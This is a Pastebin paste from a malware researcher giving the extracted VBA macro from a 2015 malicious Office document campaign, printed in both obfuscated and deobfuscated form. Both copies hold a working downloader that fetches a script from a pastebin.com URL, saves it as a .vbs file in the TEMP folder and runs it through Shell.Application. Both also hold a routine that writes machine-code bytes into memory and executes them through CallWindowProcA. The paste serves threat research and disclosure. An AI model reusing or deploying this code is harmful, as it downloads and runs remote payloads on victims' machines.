SHARE
TWEET

Extracted + deobfuscated macro

bartblaze May 8th, 2015 (edited) 531 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  6. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  7. On Error Resume Next
  8.     Dim UpICsYhhglV                As Long
  9.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  10.     Dim wZdrB                   As Long
  11.     Dim kQJlHFiPhSQwQic                As Long
  12.    
  13.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  14.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  15.    
  16.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  17.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  18.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  19.     For wZdrB = UBound(Params) To 0 Step -1
  20.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  21.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  22.     Next
  23.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  24.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  25.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  26.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  27.    
  28. End Function
  29.  
  30. Sub hfyuBJKfdgfdgsdfg()
  31. ouIYHiogeffjgyuFUFYdsg = Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) & Chr$(112) & Chr$(97) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(98) & Chr$(105) & Chr$(110) & Chr$(46) & Chr$(99) & Chr$(111) & Chr$(109) & Chr$(47) & Chr$(100) & Chr$(111) & Chr$(119) & Chr$(110) & Chr$(108) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(46) & Chr$(112) & Chr$(104) & Chr$(112) & Chr$(63) & Chr$(105) & Chr$(61) & Chr$(86) & Chr$(84) & Chr$(100) & Chr$(57) & Chr$(72) & Chr$(86) & Chr$(107) & Chr$(122)
  32. Set ertertFFFg = CreateObject(Chr$(77) & Chr$(83) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(50) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  33. Call ertertFFFg.Open(Chr$(71) & Chr$(69) & Chr$(84), ouIYHiogeffjgyuFUFYdsg, False)
  34. ertertFFFg.Send
  35. Set iyuiyui = CreateObject(Chr$(83) & Chr$(99) & Chr$(114) & Chr$(105) & Chr$(112) & Chr$(116) & Chr$(105) & Chr$(110) & Chr$(103) & Chr$(46) & Chr$(70) & Chr$(105) & Chr$(108) & Chr$(101) & Chr$(83) & Chr$(121) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(109) & Chr$(79) & Chr$(98) & Chr$(106) & Chr$(101) & Chr$(99) & Chr$(116))
  36.    ewwfgfdg = Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  37. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  38. riitiyiFF.Write ertertFFFg.ResponseText
  39. riitiyiFF.Close
  40. Set oUIYYytgsdvfFF = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
  41. oUIYYytgsdvfFF.Open Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  42. End Sub
  43.  
  44. =========================================================================================================
  45.  
  46.  
  47.  
  48. <== deobfuscated: ===>
  49. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  50. On Error Resume Next
  51.     Dim UpICsYhhglV                As Long
  52.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  53.     Dim wZdrB                   As Long
  54.     Dim kQJlHFiPhSQwQic                As Long
  55.  
  56.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  57.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  58.  
  59.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  60.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  61.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  62.     For wZdrB = UBound(Params) To 0 Step -1
  63.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  64.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  65.     Next
  66.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  67.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  68.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  69.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  70.  
  71. End Function
  72.  
  73. Sub hfyuBJKfdgfdgsdfg()
  74. ouIYHiogeffjgyuFUFYdsg = http://pastebin.com/download.php?i=VTd9HVkz
  75. Set ertertFFFg = CreateObject(MSXML2.XMLHTTP)
  76. Call ertertFFFg.Open(GET, ouIYHiogeffjgyuFUFYdsg, False)
  77. ertertFFFg.Send
  78. Set iyuiyui = CreateObject(Scripting.FileSystemObject)
  79.    ewwfgfdg = Environ(TEMP)\JGuigbjbff3f.vbs
  80. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  81. riitiyiFF.Write ertertFFFg.ResponseText
  82. riitiyiFF.Close
  83. Set oUIYYytgsdvfFF = CreateObject(Shell.Application)
  84. oUIYYytgsdvfFF.Open Environ(TEMP)\JGuigbjbff3f.vbs
  85. End Sub
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top